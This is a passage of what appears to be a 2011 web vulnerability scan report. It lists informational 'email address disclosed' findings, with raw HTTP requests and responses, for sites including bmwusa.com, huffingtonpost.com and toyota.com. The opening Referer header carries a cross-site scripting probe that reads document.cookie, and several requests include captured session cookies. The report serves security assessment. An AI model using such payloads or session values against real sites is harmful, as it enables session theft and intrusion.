Referer: http://www.aharrisonbarnes.com/?69719'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1fd47fb9727=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6l172e37v71rcv0l37cvee3g96; wpgb_visit_last_php-default=1295654937; wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22caf0b0ec76de78d91869eecad060b7ac%22%3Bi%3A1%3Bi%3A1295654938%3B%7D; wishlist_reg_cookie_manual=1

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 00:09:10 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Fri, 02 Apr 2010 09:32:23 GMT
ETag: "11d0009-3c9c-4833da81477c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: application/x-javascript
Content-Length: 15516

/*==================================================
$Id: tabber.js,v 1.9 2006/04/27 20:51:51 pat Exp $
tabber.js by Patrick Fitzgerald pat@barelyfitz.com

Documentation can be found at the following URL:
http://www.barelyfitz.com/projects/tabber/

License (http://www.opensource.org/licenses/mit-license.php)

Copyright (c) 2006 Patrick Fitzgeral
...[SNIP]...

17.7. http://www.bcgsearch.com/searchresults.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bcgsearch.com
Path:   /searchresults.php

Issue detail

The following email address was disclosed in the response:

Request

GET /searchresults.php HTTP/1.1
Host: www.bcgsearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:34:31 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=e0kuekof5a3ckuktgjpsc8gnp2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 68543

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>Attorney Jobs, Recruiting Firm, Placement Agency, Placement Service, Search
...[SNIP]...
<a href="mailto:jobs@bcgsearch.com">jobs@bcgsearch.com</a>
...[SNIP]...

17.8. http://www.bmwusa.com/JavaScript/jQuery/plugins/jquery.hoverIntent.minified.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /JavaScript/jQuery/plugins/jquery.hoverIntent.minified.js

Issue detail

The following email address was disclosed in the response:

Request

GET /JavaScript/jQuery/plugins/jquery.hoverIntent.minified.js HTTP/1.1
Host: www.bmwusa.com
Proxy-Connection: keep-alive
Referer: http://www.bmwusa.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CHECK=XP9y6GTRm#@U; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; NSC_CNX_21529_64.29.204.16=4f52b42b3660

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/x-javascript
ETag: "982f96e670abcb1:229f"
Last-Modified: Mon, 03 Jan 2011 18:06:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Fri, 21 Jan 2011 19:21:51 GMT
Connection: close
Content-Length: 1609

.../**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @par
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

17.9. http://www.bmwusa.com/JavaScript/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /JavaScript/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /JavaScript/s_code.js HTTP/1.1
Host: www.bmwusa.com
Proxy-Connection: keep-alive
Referer: http://www.bmwusa.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CHECK=XP9y6GTRm#@U; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/x-javascript
ETag: "3c36fbe570abcb1:229f"
Last-Modified: Mon, 03 Jan 2011 18:06:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Fri, 21 Jan 2011 19:21:52 GMT
Connection: close
Content-Length: 44197

.../* SiteCatalyst code version: H.17.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************
D
...[SNIP]...
av()+q+(qs?qs:s."
+ "rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+ "lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^
...[SNIP]...

17.10. https://www.bmwusa.com/JavaScript/jQuery/plugins/jquery.hoverIntent.minified.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /JavaScript/jQuery/plugins/jquery.hoverIntent.minified.js

Issue detail

The following email address was disclosed in the response:

Request

GET /JavaScript/jQuery/plugins/jquery.hoverIntent.minified.js HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; WK9733P=JhuYOfcghHTiCqgKmpjCnVgApuKM86S2aIJ5l1grGrWiHX+M3QHtrjm/1B331Jqh; ASP.NET_SessionId=nt0wfon42yzcy5iixeimo055; NSC_CNX_21529_64.29.204.16=4f52b42b3661; mbox=PC#1295637745501-300919.17#1296864682|check#true#1295655142|session#1295655081531-668160#1295656942

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Location: http://www.bmwusa.com/JavaScript/jQuery/plugins/jquery.hoverIntent.minified.js
Content-Type: application/x-javascript
ETag: "982f96e670abcb1:0"
Last-Modified: Mon, 03 Jan 2011 18:06:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Sat, 22 Jan 2011 00:10:44 GMT
Connection: keep-alive
Content-Length: 1609

.../**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @par
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

17.11. https://www.bmwusa.com/JavaScript/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /JavaScript/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /JavaScript/s_code.js HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; WK9733P=JhuYOfcghHTiCqgKmpjCnVgApuKM86S2aIJ5l1grGrWiHX+M3QHtrjm/1B331Jqh; ASP.NET_SessionId=nt0wfon42yzcy5iixeimo055; NSC_CNX_21529_64.29.204.16=4f52b42b3661; mbox=PC#1295637745501-300919.17#1296864682|check#true#1295655142|session#1295655081531-668160#1295656942

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Location: http://www.bmwusa.com/JavaScript/s_code.js
Content-Type: application/x-javascript
ETag: "3c36fbe570abcb1:0"
Last-Modified: Mon, 03 Jan 2011 18:06:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Sat, 22 Jan 2011 00:10:49 GMT
Connection: keep-alive
Content-Length: 44197

.../* SiteCatalyst code version: H.17.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************
D
...[SNIP]...
av()+q+(qs?qs:s."
+ "rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+ "lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^
...[SNIP]...

17.12. http://www.businessweek.com/news/2011-01-20/merrill-lynch-jm-said-to-be-hired-for-power-finance-share-sale.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.businessweek.com
Path:   /news/2011-01-20/merrill-lynch-jm-said-to-be-hired-for-power-finance-share-sale.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /news/2011-01-20/merrill-lynch-jm-said-to-be-hired-for-power-finance-share-sale.html HTTP/1.1
Host: www.businessweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5
Content-Language: en
X-Powered-By: Servlet/2.4 JSP/2.0
benv: nybweb04
bvh: www.businessweek.com
Content-Type: text/html; charset=UTF-8
Date: Fri, 21 Jan 2011 18:30:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta conten
...[SNIP]...
<p>To contact the reporter on this story: Ruth David in Mumbai at rdavid9@bloomberg.net</p>
<p>To contact the editor responsible for this story: Philip Lagerkranser at lagerkranser@bloomberg.net</p>
...[SNIP]...

17.13. http://www.directstartv.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.directstartv.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.directstartv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:40:28 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: PHPSESSID=hj0vosufv45apdqnbbc9nqnia2; path=/; domain=.directstartv.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: DTV_ISC=0; expires=Fri, 20-Jan-2012 18:40:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: Referrer=ds-nat-dtop-dent-ehome-none-directstartvcom-1462b; path=/; domain=.directstartv.com
Set-Cookie: Keyword=deleted; expires=Thu, 21-Jan-2010 18:40:27 GMT; path=/; domain=.directstartv.com
Set-Cookie: EngineID=deleted; expires=Thu, 21-Jan-2010 18:40:27 GMT; path=/; domain=.directstartv.com
Set-Cookie: VisitorID=148176080; expires=Sat, 21-Jan-2012 18:40:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: Visits=1; expires=Sat, 21-Jan-2012 18:40:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: VisitID=160462422; expires=Sat, 21-Jan-2012 18:40:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: lpd=default; expires=Tue, 22-Mar-2011 18:40:28 GMT; path=/; domain=.directstartv.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<meta http-equiv="reply-to" content="comments@DirectStarTV.com" />
...[SNIP]...

17.14. http://www.huffingtonpost.com/2011/01/05/david-koch-tea-party-republicans_n_804997.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /2011/01/05/david-koch-tea-party-republicans_n_804997.html

Issue detail

The following email address was disclosed in the response:

Request

GET /2011/01/05/david-koch-tea-party-republicans_n_804997.html HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 291249
Content-Type: text/html; charset=utf-8
Expires: Fri, 21 Jan 2011 22:28:25 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Fri, 21 Jan 2011 22:28:25 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
<a href="mailto:huffpolitics@huffingtonpost.com">huffpolitics@huffingtonpost.com</a>
...[SNIP]...

17.15. http://www.huffingtonpost.com/2011/01/12/sarah-palin-arizona-shooting-statement_n_807833.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /2011/01/12/sarah-palin-arizona-shooting-statement_n_807833.html

Issue detail

The following email address was disclosed in the response:

Request

GET /2011/01/12/sarah-palin-arizona-shooting-statement_n_807833.html HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 294578
Content-Type: text/html; charset=utf-8
Expires: Fri, 21 Jan 2011 22:28:27 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Fri, 21 Jan 2011 22:28:27 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
<a href="mailto:huffpolitics@huffingtonpost.com">huffpolitics@huffingtonpost.com</a>
...[SNIP]...

17.16. http://www.intelliprice.com/intellipricedealer/start.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intelliprice.com
Path:   /intellipricedealer/start.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /intellipricedealer/start.htm HTTP/1.1
Host: www.intelliprice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 4105
Content-Type: text/html
Last-Modified: Wed, 15 Dec 2010 13:54:06 GMT
Accept-Ranges: bytes
ETag: "cc5bfd895f9ccb1:64a"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:52:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <TITLE>Used car valu
...[SNIP]...
<META NAME="email" CONTENT="info@intelliprice.com">
...[SNIP]...

17.17. http://www.lawcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lawcrossing.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET /?utm_source=JDJournal&utm_medium=Banner&utm_campaign=leverage-300x250\ HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:13 GMT
Server: Apache
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=gs1oh9i6kad359a0jna6e84qs7; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 19:41:13 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 211139

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Legal Jobs | Law Jobs | Legal Job Search | Law Firm And Legal Recruiter | La
...[SNIP]...
<a href="mailto:contact@lawcrossing.com">contact@lawcrossing.com</a>
...[SNIP]...
<a href="mailto:contact@lawcrossing.com">contact@lawcrossing.com</a>
...[SNIP]...

17.18. http://www.legalauthority.com/signup.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.legalauthority.com
Path:   /signup.php

Issue detail

The following email address was disclosed in the response:

Request

GET /signup.php HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:19 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=6g5f9o9lenr88jd1ft2nnmijv6; path=/
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: PHPSESSID=6g5f9o9lenr88jd1ft2nnmijv6; path=/; domain=.legalauthority.com
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 56091

                   
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Legal Recruiter, Law Student Job, Legal Employers, Legal Search Firm, Attorney Jobs . Legal Authority</title
...[SNIP]...
<br style="line-height:3px;">
                                                           (example@domainname.com)
                                                           <br>
...[SNIP]...

17.19. http://www.msnbc.msn.com/id/41161439/ns/politics-more_politics/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.msn.com
Path:   /id/41161439/ns/politics-more_politics/

Issue detail

The following email address was disclosed in the response:

Request

GET /id/41161439/ns/politics-more_politics/ HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Fri, 21 Jan 2011 23:39:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.msn.com
Content-Length: 84830


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...

17.20. http://www.opensource.org/licenses/gpl-license.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/gpl-license.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:52:59 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=lrk48den811joe12r90meb8233; expires=Sun, 13-Feb-2011 23:26:19 GMT; path=/; domain=.opensource.org
Last-Modified: Fri, 21 Jan 2011 19:47:06 GMT
ETag: "137d5aff6fab07cd18eb3b969e04675a"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Length: 7271
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="mailto:osi@opensource.org">
...[SNIP]...
<a href="mailto:webmaster@opensource.org">
...[SNIP]...

17.21. http://www.opensource.org/licenses/mit-license.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:45:06 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=3n29fortk8c5osv64jmeft3qn7; expires=Sun, 13-Feb-2011 22:18:26 GMT; path=/; domain=.opensource.org
Last-Modified: Fri, 21 Jan 2011 18:31:08 GMT
ETag: "f3ee3970abd9b05424adb4d6b0250644"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="mailto:osi@opensource.org">
...[SNIP]...
<a href="mailto:webmaster@opensource.org">
...[SNIP]...

17.22. http://www.politico.com/blogs/onmedia/1210/Assanges_memoir_advance_tops_1_million.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.politico.com
Path:   /blogs/onmedia/1210/Assanges_memoir_advance_tops_1_million.html

Issue detail

The following email address was disclosed in the response:

Request

GET /blogs/onmedia/1210/Assanges_memoir_advance_tops_1_million.html HTTP/1.1
Host: www.politico.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.6 (Fedora)
Node: Cluster Node 1
Last-Modified: Wed, 29 Dec 2010 21:27:36 GMT
ETag: "23584b9-10030-3ce38200"
Content-Type: text/html
Cache-Control: max-age=0
Expires: Fri, 21 Jan 2011 23:39:49 GMT
Date: Fri, 21 Jan 2011 23:39:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 65584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
   xmlns:og="http://ope
...[SNIP]...
<a href="mailto:khagey@politico.com">khagey@politico.com</a>
...[SNIP]...
<a href="mailto:khagey@politico.com">khagey@politico.com</a>
...[SNIP]...

17.23. http://www.toyota.com/js/global/global.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toyota.com
Path:   /js/global/global.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/global/global.js HTTP/1.1
Host: www.toyota.com
Proxy-Connection: keep-alive
Referer: http://www.toyota.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 30 Dec 2010 16:19:15 GMT
ETag: "79f8d-2dc6f-bfc06c0"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 21 Jan 2011 19:21:55 GMT
Connection: close
Content-Length: 187503

/**
* Toyota.com global library include file. This file includes compressed versions of the following standard libraries:
*
* Prototype 1.6.1
* Script.aculo.us 1.8.3
* SWFObject 1.5
* SWFAddres
...[SNIP]...
`D$F)#K=#W($L,(vt$4t`cvt)`Ys.hav()+q+(qs?qs:s.rq(^7)),0,id,ta);qs`h;`Rm('t')`5s.p_r)s.p_r(`I`d`h}^J(qs);^T`v($E;`k$E`e^3,`H$X1',vb`I@Q=^H=s.`Q`s=s.`Q^4=`G`o`h`5s.pg)`G^z@Q=`G^zeo=`G^z`Q`s=`G^z`Q^4`h`5!id@8s.tc@3tc=1;s.flush`V()}`3#K`Ctl`0o,t,n,vo`2;s.@Q=$Po`I`Q^4=t;s.`Q`s=n;s.t($E}`5pg){`G^zco`0o){`N^t\"_\",1,$I`3$Po)`Cwd^zgs`0u$6`N^tun,1,$I`3s.t()`Cwd^zdc`0u$6`N^tun,$I`3s.t()}}@El=(`G`M`m`9`4'@Ss@20`Id=^C;
...[SNIP]...

17.24. http://www.toyotafinancial.com/consumer/framework/skins/tfs/js/calendar.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toyotafinancial.com
Path:   /consumer/framework/skins/tfs/js/calendar.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /consumer/framework/skins/tfs/js/calendar.js HTTP/1.1
